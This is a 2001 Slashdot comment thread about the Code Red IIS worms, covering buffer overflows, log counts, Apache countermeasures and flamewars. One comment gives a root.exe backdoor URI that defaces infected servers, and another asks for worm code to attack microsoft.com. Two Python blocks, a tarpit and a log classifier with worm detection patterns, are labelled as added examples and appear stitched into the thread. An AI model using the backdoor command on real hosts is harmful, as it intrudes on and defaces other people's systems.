    Last year the astroturfers' chorus was "Who do you sue when something goes dreadfully wrong?"

    Well, something has gone dreadfully wrong. Where are all the lawsuits? Where are all the astroturfers gleefully pointing out that Microsoft's products are better than OSS products, because you can sue Microsoft for your troubles now?

    --
    Sheesh, evil *and* a jerk. -- Jade
  336. Re:More info? by westfieldscientific · · Score: 1

    The circus got seriously underway here late last Saturday. At that time I made a short list which can be found here.

    The cablemodem traffic is annoying but so far no system interference to report here. The attempted attacks just bounce off Apache. Add this to my ever-increasing list of reasons why I'm glad I don't run Windoze.

    --
    give me a /home where the buffalo roam
  337. Anti-worm history by Anonymous Coward · · Score: 0
    Actually, the first time I heard of the concept of a worm to hunt another worm was in the early 1970s.

    There was a rumor of a "catch me if you can" worm lurking around the CyberNET commercial network. It was low threat, as only one copy was circulating itself, and all it did was occasionally tease the system console once as it left a system.

    One of the obvious proposals was to make a hunter worm which would kill the original.

  338. Maybe Microsoft originated Code Red? by jlrowe · · Score: 1

    After all, CR will identify NT and Win2k servers, that might possibly be running on pirated software. Now we have logs all over the place of where they are. Do they have licenses??????

  339. Heh. by Scoria · · Score: 1

    Don't bite the hand that feeds you, PCWorld.

    --
    Do you like German cars?
  340. squid can protect your http server by node3667 · · Score: 1

    Just a single line to say that squid ( http://www.squid-cache.org) can be configured as an acceleration server only (without the proxying), and will automatically deny the default.ida, as well as protect your server from unacceptables requests.

  341. You should be sued by Anonymous Coward · · Score: 0

    Yes, but when you already know that something sucks before you buy it, it becomes your fault, not theirs. Anyone who was unethical enough to install Microsoft software just in the hopes that they would get to sue Microsoft later over the known defects, deserves to lose.

    When you buy Microsoft products, Microsoft isn't fucking you. You are fucking yourself. And you knew you were fucking yourself, but thought someone else would have to suffer the consequences instead of you, either because of the classic explanation that "Everyone else does it" or because Microsoft has deep pockets. Well, take some accountability for your own actions for a change.

    Oh yeah, and if someone that works for you buys a Microsoft product for use at your business, fire that person. Nothing else will save you, except maybe education. (And we've tried about ten years of that, so education can be assumed to be futile.)

  342. Re:Buffer overflow vulnerabilities by cduffy · · Score: 1

    That's mighty odd -- for how long does it use 100% CPU? Do you cause it to loop?

    If anything, this is an issue with your Java runtime, not the language or environment spec. Does it happen in GCJ-compiled code?

  343. Subject: Code Red by VB · · Score: 1

    Interesting e-mail someone just sent me:



    The server hosting your web site is infected with the "Code Red" Worm. Just thought you might want to notify your sys admin or hosting company. We have received thousands of connection requests from this server and others on the www.xxx.yyy.zzz IP network.


    So someone has finally ported Code Red to Apache? >:)

    --
    www.dedserius.com
    VB != VisualBasic
  344. Re:How can you get a BIGGER back door than CRII? by haral · · Score: 1

    I'd like a web interface to control the compromised machine.

  345. Re:M*derators! by Anonymous Coward · · Score: 0

    all questions about moderation are off topic, as is this message. read the fscking faq, numb-nuts.

  346. Oh please, did you see Urban Legend II? by boboroshi · · Score: 1
    bad movie.

    However, The Nightmare on Elm Street and Halloween series were pretty tight.

    See, what will happen next is that there will be a code red PREQUEL. Actually, three of them. And their titles will just absolutely suck.

    --
    // john athayde
    # x@boboroshi.com
    # http://www.boboroshi.com/
    1. Re:Oh please, did you see Urban Legend II? by roju · · Score: 1

      Wasn't part of Urban Legend 1 filmed at U of Toronto?
      That big auditorium was, I seem to recall a tourguide at UT telling me that.

    2. Re:Oh please, did you see Urban Legend II? by Anonymous Coward · · Score: 0

      That's classified.

  347. My Log.. by Cobain · · Score: 1

    My log starts at Aug 1st at 7:30am...

    [cobain@dirtyhippie cobain]$ more /etc/httpd/logs/access_log | grep default.ida | wc -l
    595

    Not that bad, how about you all?

    --

    ----------------------
    58.0% slashdot corrupt
  348. Code Red infection in spite of patch by shibut · · Score: 2, Interesting

    At work we have a M$ w2k brand new server (installed the last week of July). The server was patched before August 1 and did not have plain vanilla CR. Nevertheless, on Sunday August 6th we still got semi-infected with CRII. I say semi infected since it totally ruined our server's ability to function properly but did not try to infect other machines. When our IT support guy called M$, they claimed we should re-install the patch but went to great lengths to make us re-download the patch from a url they specified (instead of using the patch file we had downloaded at the end of July). This makes me think that maybe they improved the patch since then. Re-installing the patch solved some of the problems and the rest our IT guy had to fix manually.

    We've been CR-free for 2 whole days now

    For the record: I wanted a Linux server but the guys at work (I'm a gal) didn't want to give up the potential to share calendars (they don't actually use it at the moment but options have value on paper at a VC firm...).

  349. Re:Copycats by Anonymous Coward · · Score: 1, Insightful

    Well if they had written it right the first time there'd be no need for duplicates because it would have been decent enough to trash IIS when it was done.

  350. The total opposite of being /.ed by xZAQx · · Score: 1

    W0w, i've never gotten to a slashdot-submitted story so quickly. Other side of the spectrum. Just goes to show you, Taco, nobody gives a shit.
    CODE BLUE!

    --

    We dance to all the wrong songs.
    --Refused.
  351. You know... by Anonymous Coward · · Score: 0

    Why doesn't someone out there write a Code Red worm that infects, installs the patch to disable the back door, then deletes itself?

  352. I think we should switch by Anonymous Coward · · Score: 0

    I think we should switch to IIS. This way we can have a good vacation from the internet while the code worm runs through the system

  353. Re:Microsoft should be sued by szomb · · Score: 1

    Bwahahahahaha!!!!!

    Score 6, HILARIOUS

    --
    Just because a few of us can read write and do a little math, doesn't mean we deserve to conquer the universe
  354. Re:Put it in another log and forget about it. by Anonymous Coward · · Score: 0

    For each IP, go to this URI: /scripts/root.exe?+%2fc+echo+%22document.location%3dgoatse.cx%22+>+..\wwwroot\default.htm'

  355. Waiting for the impact by The_Weevil · · Score: 1

    I'm still logging codered live at http://www.baxpace.com/gateway

    I have not picked up this 3rd version yet, but I have picked up a slight code alteration in version 2, which makes codered look for root.exe in C:, not D:. I posted a story on it...

    --
    ghaa.
  356. Help me out on this one... by mystery_bowler · · Score: 2, Informative

    I understand that Code Red is a worm, but I wish I had more of an understanding of how it really works and what it is really doing. Anyone got a good explanation or link to an explanation?

    --

    My sigs always suck.
    1. Re:Help me out on this one... by Tony-A · · Score: 2, Informative

      What kind of server buffer handler would execute the content of the buffer? You have to go out of your way doing stupid things to make it happen. Who are these morons at Microsoft who write that kind of code?
      Flippant answer. The kind that win benchmarks. Anything that reserves reasonable amounts of memory for variable-length things and cannot or does not ensure that nothing spills outside its limits has this kind of problem, and that's most everything, not just Microsoft. Note that the real problem is not the exploits, it is the unnoticed cases where innocent input corrupts logically unrelated data.

    2. Re:Help me out on this one... by Anonymous Coward · · Score: 0
      A buffer overflow is when something goes past that maximum number of letters, and a program with a buffer overflow problem usually does something strange with the information past that point -- in this case, default.ida takes everything after that number of letters and runs it like it were a program.

      Normally, this would just crash IIS (since it's getting a bunch of garbage, and running garbage makes programs crash) but Code Red is purposely designed so after the right number (200 or whatever) of XXX/NNN's, it tacks on the code to infect the computer with Code Red.

      Normally ??
      That's only "normal" if you code as if no-one could "accidentally" send you extra data.
    3. Re:Help me out on this one... by DeadMeat+(TM) · · Score: 5, Informative
      Code Red takes advantage of what's called a "buffer overflow" in Microsoft's IIS web server software.

      What happens is that IIS sits there, waiting for Web browsers to request pages. A Code Red infected server starts randomly picking other computers on the Internet or the network, and requests them to send a Web page called default.ida. It then passes a huge parameter to default.ida.

      Apparently, default.ida has hard-coded a maximum length for parameters -- say, 200 letters. (Probably not actually 200 -- but you get the idea.) That's what all the XXX and NNN's are there for -- it's the 200 (etc.) letters that's the most default.ida is expecting to receive. A buffer overflow is when something goes past that maximum number of letters, and a program with a buffer overflow problem usually does something strange with the information past that point -- in this case, default.ida takes everything after that number of letters and runs it like it were a program.

      Normally, this would just crash IIS (since it's getting a bunch of garbage, and running garbage makes programs crash) but Code Red is purposely designed so after the right number (200 or whatever) of XXX/NNN's, it tacks on the code to infect the computer with Code Red. So, IIS runs the code, the computer becomes infected with Code Red, it starts trying to spread it to other computers, and the whole cycle starts all over again.

    4. Re:Help me out on this one... by Anonymous Coward · · Score: 0

      http://www.mdstud.chalmers.se/~md0claes/txt/smashstack.html

  357. From the article by slashdot.org · · Score: 1, Funny

    The Code Red worm spreads surreptitiously through a hole in certain Microsoft software such as Internet Information Server (IIS) Web software and Windows NT or 2000 operating systems

    Ah, so Windows NT or 2000 are vulnerable too, uh? God, I love proper journalism.

  358. Apache infected by Code Red! by c13v3rm0nk3y · · Score: 1

    I agree, though I've been racking my brain trying to come up with a creative way to use these incoming requests.

    The most net-friendly thing I can come up with is to create a 0-byte /default.ida and just return the 30-byte 200 OK. This still clogs up the logs, but it doesn't add too much general noise, especially if you have custom error messages, like I do.

    The most Evil thing I could come up with is using mod_rewrite to send the exact URI and query string back to the originating server:

    <IfModule mod_rewrite.c>
    # Turn on the rewriting engine
    RewriteEngine on

    # set to 5 for debugging, 0 otherwise
    RewriteLogLevel 0
    RewriteLog logs/rewrite_log

    # If you find a URI that starts "/default.ida", change it to
    # http://REMOTE_HOST/ and send the whole URL back wrapped in a
    # "303 See Other" (the trailing "?" drops the worm's query string)

    RewriteCond %{REQUEST_URI} ^/default\.ida
    RewriteRule ^/(.*)$ http://%{REMOTE_HOST}/? [redirect=seeother,last]

    # If you are EVIL, construct a URL of the form
    # http://REMOTE_HOST/REQUEST_URI?QUERY_STRING and do the same
    # (with no "?" in the substitution, mod_rewrite appends the
    # original query string by itself).

    #RewriteRule ^/(.*)$ http://%{REMOTE_HOST}/$1 [redirect=seeother,last]
    </IfModule>

    Don't feel left out, just because you run Apache! You can be "infected", too. It's fun for the whole family!

    The best solution would be an application-level way to just silently block or ignore these requests. It's just not easy to turn off logging on matching a URI. I suppose you could make a virtual host that serves on /default.ida, with logging turned off...?

    --
    -- clvrmnky
  359. Moderate the parent UP UP UP by Anonymous Coward · · Score: 0

    This man is onto something... we need a new version of the worm... one that spreads, and then DoS's www.microsoft.com. Could some enterprising young geek please post the code for something of this nature to /.! Thanks for your time...

  360. Re:Serious blow to open source & free software by M-G · · Score: 1

    Sure, other web servers have potential security holes. But it was Microsoft that decided the index server ISAPI should be installed and accessible by default.

  361. Better Names by zpengo · · Score: 1, Flamebait

    Code Red I, II, and III are pretty dull names. Why not call II and III something like Code Blue or Code Monkey or something.

    --


    Got Rhinos?
    1. Re:Better Names by Anonymous Coward · · Score: 0
      Read on The Onion: 'Dress Code Cracked' :)

      --EMH_Mark3

    2. Re:Better Names by epfreed · · Score: 2, Funny

      How about "Code Red III: Attack of the Clones?"

  362. What is the CRIII signature? by yuf · · Score: 1

    Still "XXXXXXX", "NNNNNNN", or something new? Is there an easy way to tell this new varient? Or must you get the payload to know? Also, is there any pointer to what the new payload is? I'm not convinced yet.....

    1. Re:What is the CRIII signature? by Unknown+Bovine+Group · · Score: 1
      There is no Code Red III. Some people counted 1.a as 2 hence II is called III.

      --
      m00.
  363. Serious blow to open source & free software by Sloppy · · Score: 5, Funny

    Here we have something that does not come with source code, but people are still able to maintain the program, improve its performance, and then get those improvements quickly out into the field. Even Linux updates don't get distributed this efficiently.

    --
    As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
    1. Re:Serious blow to open source & free software by Phroggy · · Score: 1

      They quote a columnist for Microsoft's TechNET who makes the false claim that IIS is more popular than apache, and attributes the widespread exploits to that (false) popularity!

      But of course IIS is more popular at Microsoft! Why wouldn't it be? ;-)

      --
      $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
      $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
    2. Re:Serious blow to open source & free software by jmv · · Score: 2

      Sorry, I didn't understand which program you were talking about... I agree with you now ;-)

    3. Re:Serious blow to open source & free software by Unknown+Bovine+Group · · Score: 1
      Yeah, I know all the press I've seen has said, "Apache, an alternative and better web server, and would have saved all these admins from this huge headache."

      and yes that was sarcastic.

      --
      m00.
    4. Re:Serious blow to open source & free software by jmv · · Score: 2

      Even Linux updates don't get distributed this efficiently.

      I don't know how efficient distribution of Linux updates is, but this is certainly not efficient. The different versions of Code Red have been there for more than a month and it doesn't seem to be about to stop. With the amount of publicity there is, you'd expect more people would patch their system. Again, I'm not saying Linux is better on update efficiency, although there seem to be far fewer security holes.

    5. Re:Serious blow to open source & free software by Mike+Schiraldi · · Score: 2, Funny

      I guess this is the Push Technology thing they made such a fuss about a few years ago.

    6. Re:Serious blow to open source & free software by ksheff · · Score: 2

      They also make it sounds like IIS is the standard and that Apache is just an alternative. I guess they don't read Netcraft's reports. Just MS PR.

      --
      the good ground has been paved over by suicidal maniacs
  364. Back Door? Somebody call the Goatse.cx guy! by Bonker · · Score: 2

    leaves a wider ?back door'' on infected machines,

    Code Red II left a copy of cmd.exe in IIS's 'scripts' directory, giving any and all comers who know the machine's IP address the ability to perform *any* system level command with nothing more than a web browser.

    My question here is, how the hell do you have a 'wider' backdoor than that?!

    Tech details are sparse. I haven't seen anything yet. Anyone have links to pages about the new variant's payload?

    --
    The next Slashdot story will be ready soon, but subscribers can beat the rush and slashdot the links early!
  365. Re:Shutting off IIS on an comprimised box... by Anonymous Coward · · Score: 0

    nope still something wrong with this. I have had 38 attacks on my machine in the last 4 hours and this is as close as I get when use the code you suggest: CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

  366. Re:Is this a trick from Hollywood? by optikSmoke · · Score: 1

    I know what you mean.
    Jurassic Park III was the best movie i've ever seen, especially since it came from the vast imaginations of Hollywood scriptwriters instead of Michael Crichton.

  367. Re:Buffer overflow vulnerabilities by TheMidget · · Score: 2, Insightful
    The buffer overflow we're talking about is not in an OS kernel (Windows), but in an application (the IIS webserver), for chrissakes! And yes, there are webservers coded entirely in Perl. For example, webmin's miniserv. And I'm sure, there are webservers entirely coded in Java too (tomcat?).

    The thing is, with Perl and Java, the language's runtime handles memory allocation/de-allocation. And barring a bug in the language itself, there's no way an app written in such language can overflow a buffer. Either the buffer will be grown dynamically to fit the data, or the app will get an exception. But corruption of unrelated data cannot happen in this way.

  368. Thank God by Anonymous Coward · · Score: 0

    Finally a Code Red article on Slashdot that doesn't mention Sircam!

  369. Gives me an idea to stop it spreading so fast... by chainsaw1 · · Score: 2

    I wonder if you can slow down the worm by stalling the worm's thread process. If you added a default.ida file that, essentially, took forever to return data/download (or at least caused a timeout while waiting to load a file), would the worm slow down?

    Pros: We know the worm only creates 99 threads at a time. This could theoretically stop it spreading

    Cons: Bandwith limit (stalled download) needs to be used to avoid DDOS-ing yourself.

    Need to kill the connection to keep from memory busting the TCP stack or occupying all available TCP ports.

    You'd basically be playing TCP firewall games based on a request on httpd for hitting a specific file in the website file tree. Scripting that may be difficult or impossible.

    Anyone have any other thoughts?

    --
    - Sig
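
    The stalling idea above, worked through as an added example; this is not code from the thread or from the poster, and it assumes, as the poster does, that a worm thread blocks reading the response. It is a minimal tarpit in Python: a normal request gets a short 404, a request for /default.ida gets a header with no Content-Length and then one byte every few seconds until a deadline, and a cap on concurrently held connections addresses the two "cons" listed above (you don't exhaust your own sockets, and the bandwidth spent is one byte per interval per connection). All tunables (cap of 50, five minutes, ten-second trickle) are assumed values. simulate() drives a handler over a socketpair so the behaviour can be checked without binding a port.

```python
import socket
import threading
import time

# Tunables: assumed values for illustration, not figures from the thread.
MAX_STALLED = 50         # worm connections we are willing to hold at once
STALL_SECONDS = 300.0    # how long each one is held open
TRICKLE_INTERVAL = 10.0  # seconds between one-byte body sends

_stalled = 0
_stalled_lock = threading.Lock()


def is_worm_request(request_line: bytes) -> bool:
    """True for the worm's 'GET /default.ida?...' probe; anything else is a normal client."""
    parts = request_line.split(b" ")
    return len(parts) >= 2 and parts[0] == b"GET" and parts[1].startswith(b"/default.ida")


def handle_connection(conn, stall_seconds=STALL_SECONDS, trickle=TRICKLE_INTERVAL,
                      max_stalled=MAX_STALLED) -> str:
    """Serve one accepted connection; returns 'normal', 'stalled', 'dropped' or 'timeout'."""
    global _stalled
    conn.settimeout(5.0)
    try:
        data = conn.recv(4096)
    except (socket.timeout, OSError):
        conn.close()
        return "timeout"
    request_line = data.split(b"\r\n", 1)[0]
    if not is_worm_request(request_line):
        conn.sendall(b"HTTP/1.0 404 Not Found\r\nContent-Length: 0\r\nConnection: close\r\n\r\n")
        conn.close()
        return "normal"

    # Respect the cap so the tarpit cannot be turned into a self-inflicted DoS.
    with _stalled_lock:
        over_cap = _stalled >= max_stalled
        if not over_cap:
            _stalled += 1
    if over_cap:
        conn.close()
        return "dropped"

    try:
        # No Content-Length: a client that reads the body must wait until we close.
        conn.sendall(b"HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\n\r\n")
        deadline = time.monotonic() + stall_seconds
        while time.monotonic() < deadline:
            time.sleep(min(trickle, max(0.0, deadline - time.monotonic())))
            try:
                conn.sendall(b".")  # one byte keeps the peer's read from completing
            except OSError:
                break  # the worm gave up or reset; nothing more to hold
        return "stalled"
    finally:
        with _stalled_lock:
            _stalled -= 1
        conn.close()


def simulate(request: bytes, **kw):
    """Run one handler over a socketpair; returns (result, everything the client read)."""
    srv, cli = socket.socketpair()
    cli.sendall(request)
    result = handle_connection(srv, **kw)
    cli.settimeout(1.0)
    reply = b""
    try:
        while True:
            chunk = cli.recv(4096)
            if not chunk:
                break
            reply += chunk
    except socket.timeout:
        pass
    cli.close()
    return result, reply


def serve(port: int = 8080):
    """Stand-alone listener: one thread per connection, the cap bounds the stalled ones."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as ls:
        ls.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        ls.bind(("", port))
        ls.listen(128)
        while True:
            conn, _ = ls.accept()
            threading.Thread(target=handle_connection, args=(conn,), daemon=True).start()


if __name__ == "__main__":
    serve(8080)
```

    Whether this slows a given worm depends on its own socket timeout, which the thread does not establish; what the code guarantees is only that your side never holds more than the cap and never sends more than one byte per interval.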
  370. Re:Linux to the rescue? by Syberghost · · Score: 2

    The bottom line regarding legality isn't what clever logical constructs we can formulate on /.

    The bottom line is what 12 people too stupid to get out of jury duty are going to think, and the average person would think that making use of a hole in order to run code on somebody else's machine without their permission is an intrusion, and thus illegal.

    Your life isn't in danger from the attack on your system, so you have a "duty to retreat" that compels you to shut down your system if necessary, not counterattack.

    I don't agree with it, but there won't be 12 of me on your jury.

  371. Re:make some money off banner ads by Anonymous Coward · · Score: 0

    your website sucks.
    -c

  372. I saw that Reuters story earlier by GC · · Score: 4, Interesting

    but I have not seen any instances of attempted infection.

    It's all very vague and the chances of mistaking Code Red rev C as Code Red III, (rev C = version II) are simply too high.

    I also assume that this takes advantage of the same Index Vulnerability in IIS, which if anyone has been hit by either of the first two versions then they will have minimised the risks of a new version which uses the same vulnerability.

    1. Re:I saw that Reuters story earlier by the_2nd_coming · · Score: 1

      yeah but the back door is still there from CR2 so, if that is not fixed, CR3 could use that; of course this will eventually go out of existence as more and more servers are reinstalled and patched; there will be fewer and fewer systems that are vulnerable, however, ISPs will have to crack down on those stupid W2K home users.

      --



      I am the Alpha and the Omega-3
  373. make some money off banner ads by SethJohnson · · Score: 5, Insightful


    Taco, I recommend you sign up with one of those online casino sites and host banner ads on your server with the file name of /default.ida. You should be able to rack up a few thousand unique page views a day by pointing the scourge at the scourge (ala Fist Full of Dollars).
    1. Re:make some money off banner ads by ekrout · · Score: 1
      I see from your other posts that you've taken to filling the grammar-Nazi role.

      No, I just enjoy correcting morons like Taco and yourself.

      That's sad.

      I guess.

      That's just fuckin' sad (by the way: I would gauge that you are both a pillowbiter and a cockbiter).

      Is anything not "sad" to you? Just curious...

      cockbiter ... pillowbiter ... dildo

      I see someone has an I-Hate-The-World's-Living-Things-Because-I'm-Barely-Smart-Enough-To-Point-And-Click-My-Way-To-MCSE-Certification complex. Interesting.

      --

      If you celebrate Xmas, befriend me (538
    2. Re:make some money off banner ads by Anonymous Coward · · Score: 0

      No, I just enjoy correcting morons like Taco and yourself.

      The funny thing is that once you enter the real world you'll have a cold slap of reality on the face: Suddenly being the "smart one" in a small group of people doesn't quite count when you're working at a company where the software development team was selected among a potential population base of 100s of thousands, and every one of them has a "high IQ". You're not special, moron, and I would estimate that you're less-than-average in the advanced level of computer sciences. I can gauge exactly what you're like right now because I've seen a million like you: Moron school-boy interns/co-ops who have absolutely marginal programming skills, but they're sure that they're the shit: Hey, in a class full of didn't-want-to-be-there classmates (often drunk) they came out on the upper end of the bell curve: Shit they must be awesome! Of course they blow out pretty quickly and soon are back to pursue another field that isn't quite so competitive.

      However, moron, you keep incorrectly "correcting" people, however appalling it is. You sure must be smart!

    3. Re:make some money off banner ads by Anonymous Coward · · Score: 0

      I'm a no account anonymous coward - rudy@winface.com.... I love your idea re banner ads. And it's easy to implement as a help to your friends -- just use Apache's Redirect command. For example my httpd.conf now includes (in the directive for htdocs) Redirect /default.ida http://www.msn.com/ but you could just as easily redirect to a doubleclick counter... or

    4. Re:make some money off banner ads by Anonymous Coward · · Score: 0

      Oooh isn't a word.

    5. Re:make some money off banner ads by Anonymous Coward · · Score: 0

      When you do banners for a casino, you're spinning the wheel. You might get paid for it, you might not :)

      Typical eh?

  374. Copycats by Wind_Walker · · Score: 0, Redundant
    This is getting a bit ridiculous. First it was Code Red, which was actually a pretty nice piece of code. Then Code Red II, which was a hack job by somebody who barely knew how to use a text editor. Now we have Code Red III? I'm willing to bet that it's an even worse job than II!

    This is the same damn thing that happened to the I Love You worm that spread around. About a week after it was calmed down, some 1337 5kr1p7 K1dd13 got a hold of it and changed 2 lines, re-releasing it. Stupid copycating, that's all it is.

    I'm willing to bet that whoever edited the virus this time is reading slashdot right now and is getting a boner off the fact somebody submitted it (if he didn't submit it himself).

    Get over it. Code Red is dead. And all the editing and all the 1337 references in the world are not going to help it; Just let it die.

    1. Re:Copycats by billh · · Score: 2

      How in the hell did this get moderated up? This thing is active, and will remain active, until EVERY IIS server has been patched. Whether or not the patch even works correctly remains to be seen.

      We'll be seeing this thing for months.

      From one of my servers:

      Report generated on August 10, 2001 at 03:08
      59 Code Red
      525 Code Red II
      584 Total attacks.

      Report generated on August 09, 2001 at 03:08
      76 Code Red
      613 Code Red II
      689 Total attacks.

      Report generated on August 08, 2001 at 03:08
      107 Code Red
      578 Code Red II
      685 Total attacks.

      Report generated on August 07, 2001 at 03:08
      124 Code Red
      419 Code Red II
      543 Total attacks.
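
      Comment 362 asks whether the padding letters in the default.ida query string are enough to tell the variants apart, and the report above counts hits per variant. The following is an added example, not code from the thread or from anyone posting in it: a small Python classifier that runs over Apache access-log lines (the sample lines are constructed, not real traffic) and produces a count in the same shape as the report above, plus a per-source breakdown so the noisiest neighbours stand out. The letter-to-variant mapping (N for the original Code Red, X for Code Red II) and the root.exe/cmd.exe "backdoor probe" label come from the public write-ups of the worms, not from this thread, and are assumptions here.

```python
import re
from collections import Counter, defaultdict

# Apache common/combined log line: only the client IP and request path matter here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log (not real traffic); the padding is shortened for readability.
SAMPLE_LOG = """\
10.1.2.3 - - [08/Aug/2001:03:08:01 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 278 "-" "-"
10.1.2.4 - - [08/Aug/2001:03:08:05 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 278 "-" "-"
10.1.2.5 - - [08/Aug/2001:03:08:09 -0500] "GET /index.html HTTP/1.1" 200 1532 "-" "Mozilla/4.0"
10.1.2.4 - - [08/Aug/2001:03:09:11 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 278 "-" "-"
10.1.2.6 - - [08/Aug/2001:03:10:00 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
this line is not a log entry and is skipped
"""


def classify(path: str) -> str:
    """Label one request path. The N/X mapping is the assumed one described in the lead-in."""
    if path.startswith("/default.ida"):
        query = path.partition("?")[2]
        if query.startswith("N"):
            return "Code Red"
        if query.startswith("X"):
            return "Code Red II"
        return "default.ida (unknown padding)"
    low = path.lower()
    if "root.exe" in low or "cmd.exe" in low:
        return "backdoor probe"
    return "other"


def summarize(log_text: str):
    """Return (Counter by kind, {ip: Counter by kind}); ordinary traffic is left out."""
    by_kind = Counter()
    by_source = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or truncated line: skip it rather than abort the run
        kind = classify(m.group("path"))
        if kind == "other":
            continue
        by_kind[kind] += 1
        by_source[m.group("ip")][kind] += 1
    return by_kind, dict(by_source)


def report(log_text: str) -> str:
    """Counts in the same shape as the per-day report above, plus the top sources."""
    by_kind, by_source = summarize(log_text)
    lines = [
        f"{by_kind['Code Red']} Code Red",
        f"{by_kind['Code Red II']} Code Red II",
        f"{by_kind['backdoor probe']} backdoor probes",
        f"{sum(by_kind.values())} Total attacks.",
    ]
    noisiest = sorted(by_source.items(), key=lambda kv: -sum(kv[1].values()))[:5]
    for ip, kinds in noisiest:
        lines.append(f"  {ip}: " + ", ".join(f"{n} {k}" for k, n in kinds.most_common()))
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_LOG))
```

      Feed it a real access_log with `report(open("/etc/httpd/logs/access_log").read())`; the unknown-padding bucket is what you would watch for a genuinely new variant, since neither letter run would match it.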

    2. Re:Copycats by r1ddl3 · · Score: 1

      Check you server logs and then tell me it's dead

    3. Re:Copycats by Nater · · Score: 1

      The folks here at the Fortune 500 company I work for who have been working around the clock since Wednesday trying to clean up this mess will be real happy to hear that you don't believe it exists.

      Folks at your Fortune 500 company will also be real happy to hear that they can get, for free in many cases, a webserver and operating system that are significantly less susceptible to this sort of thing, especially since updated packages which fix this type of hole can be installed near-automatically generally within a day of discovering the vulnerability, and support for this platform is available from any one (or several, if they like) of thousands of people and companies around the world. They don't even have to buy new hardware, it will run on their existing systems.

      Would you mind suggesting it to them?

      --

      I like to play children's songs in minor keys.
      "We're all sons of bitches now." --J. Robert Oppenheimer

    4. Re:Copycats by Syberghost · · Score: 2

      Would you mind suggesting it to them?

      Yeah, us folks on the Unix side of the operation have been snickering at the NT guys the whole time.

      Unfortunately, some of our stuff requires some of theirs to be there in order to push the data around.

    5. Re:Copycats by DoXaVG · · Score: 1

      And why the hell weren't they working on it when the advisory first came out in June? They aren't doing their job if it takes an infection of this scale to make them patch this hole. And let's face it, if it took them one and a half months to get around to patching this one hole, how many others have they left unpatched? See ya around when the next worm hits. I don't have one bit of sympathy for these people, the bottom line is they weren't doing their job.

    6. Re:Copycats by Syberghost · · Score: 2

      And why the hell weren't they working on it when the advisory first came out in June? They aren't doing their job if it takes an infection of this scale to make them patch this hole. And let's face it, if it took them one and a half months to get around to patching this one hole, how many others have they left unpatched? See ya around when the next worm hits. I don't have one bit of sympathy for these people, the bottom line is they weren't doing their job.


      I completely agree. And yet, despite the fact that I was doing my job, this still left me dead in the water.

      And some of them were working on it when they got the advisory, but couldn't fix it yet because their third-party software doesn't work with Service Pack 6 installed, so they can't install the patch. They were working with the vendors to get the software updated, or working to find or code a replacement, trusting that the NT admins with customer-facing IIS servers would patch.

      Some of those folks were overridden by PHBs.

      While this was going on, I was being told I couldn't install a Sun FTP patch "until it was tested via the normal process", which added about a week of time in which I was subject to a known vulnerability, but couldn't do dick about it.

      Ironically, we installed it Thursday.

      I had it ready to go five minutes after the advisory was released, but couldn't install it for a week, because of management. The NT folks go through similar problems.

  375. RedirectMatch -- http://www.microsoft.com (!) by mkcmkc · · Score: 1
    Interesting idea, but shouldn't the redirect go to microsoft.com?

    They set up this Internet load test after all; I'm sure they'd like to hear of the results...

    --Mike

    --
    "Not an actor, but he plays one on TV."
  376. Deredoc by RobertGraham · · Score: 2
    http://robertgraham.com/tools/deredoc

    Source compiles on Windows and Linux, binaries available, works with libpcap, can respond back to a range of addresses.

    BTW, this technique has been used since the early-1990s (i.e. I wrote a plugin for the ProTools sniffer that did something like this).

  377. Re:Responsibility lies with the Network by medcalf · · Score: 1

    Well, yeah. I build ISPs for a living. Most of the ones I work with have intelligent routers/firewalls, and it would be fairly easy to shut down port 80 outgoing from specific boxes. That wouldn't stop anything on the local subnet, but it would at least begin to contain the problem, and would alert the clueless (since they wouldn't be able to get out via the web).

    As an aside- the first comment was rated a troll????

    -jeff

    --
    -- Two men say they're Jesus. One of them must be wrong. - Dire Straits
  378. "Spread of Diseases" by szomb · · Score: 1

    Most proponents of prostitution prohibition say it's because it spreads diseases. On the same grounds, we should institute a ban against running Windows servers. :)

    Windows = the cheap $2 whore

    --
    Just because a few of us can read write and do a little math, doesn't mean we deserve to conquer the universe
  379. Code Plaid by spack · · Score: 1
    If Code Red keeps getting worse, it won't be red anymore. It will be Plaid.
    Oh my God! They've gone to plaid. -- Lonestar from Spaceballs: The Movie
    --
    For those who fight for it, life has a flavor the sheltered will never know.
  380. Public Logfile - for *Educational* Purposes Only by BigBlockMopar · · Score: 5, Informative

    I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log
    should we set up a site somewhere of ip addrs?

    Already got one! Remember, the list, including fully-qualified hostnames, is for _educational_ purposes only. I've made it available so that we can study how this thing moves, not for such purposes as mass-spamming postmaster@$IIS-INFECTED-HOSTNAME with flames reminding him that he is a blithering idiot, nor for other untoward activities which may be performed on a machine with a shell in a webserver's public directory.

    --
    Fire and Meat. Yummy.
  381. Bill Gates by speederaser · · Score: 1

    Brighter than me Brighter than you Brighter than anything On your shoe

  382. Re:Microsoft should be sued by Dr+Caleb · · Score: 2
    Why do poor bastards get sued for using a little bandwidth to participate in an interesting project... [*snip*]... To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected Let's look at that shall we...

    2 patches, ~500k for both. 1 for NT4, one for W2k.
